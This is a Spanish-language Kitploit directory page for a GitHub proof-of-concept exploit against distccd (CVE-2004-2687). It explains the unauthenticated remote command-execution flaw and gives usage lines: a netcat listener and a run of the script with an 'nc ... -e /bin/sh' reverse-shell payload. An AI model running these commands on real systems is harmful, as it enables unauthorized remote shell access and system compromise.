Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/h3x0v3rl0rd/distccd_rce_cve-2004-2687
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubh3x0v3rl0rd/distccd_rce_cve-2004-2687

distccd_rce_CVE-2004-2687

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

distccd_rce_CVE-2004-2687

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Actualizado a Python3

Resumen

Este repositorio contiene un exploit de Prueba de Concepto (PoC) para la vulnerabilidad distccd identificada como CVE-2004-2687. La vulnerabilidad existe en el demonio distccd, que forma parte del sistema de compilación distribuida de C/C++ distcc. Cuando está mal configurado, distccd permite a atacantes remotos ejecutar comandos arbitrarios en el servidor sin autenticación alguna.

Detalles de la vulnerabilidad

distcc está diseñado para distribuir tareas de compilación entre múltiples máquinas para acelerar el proceso de compilación. Sin embargo, si el demonio distccd no está asegurado correctamente, expone una vulnerabilidad de ejecución remota de código (RCE). Esto ocurre porque el demonio escucha en un puerto de red y acepta comandos de cualquier cliente, permitiéndoles ejecutar comandos de shell en el servidor como el usuario que ejecuta el demonio.

A la vulnerabilidad se le ha asignado CVE-2004-2687 y afecta a las versiones de distccd anteriores a 3.1. Cuando se explota, un atacante puede obtener acceso a la shell de la máquina vulnerable, lo que conduce a un posible compromiso de todo el sistema.

root@kitploit:~
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

Vulnerabilidad :

image

Exploit :

image

Descargar herramienta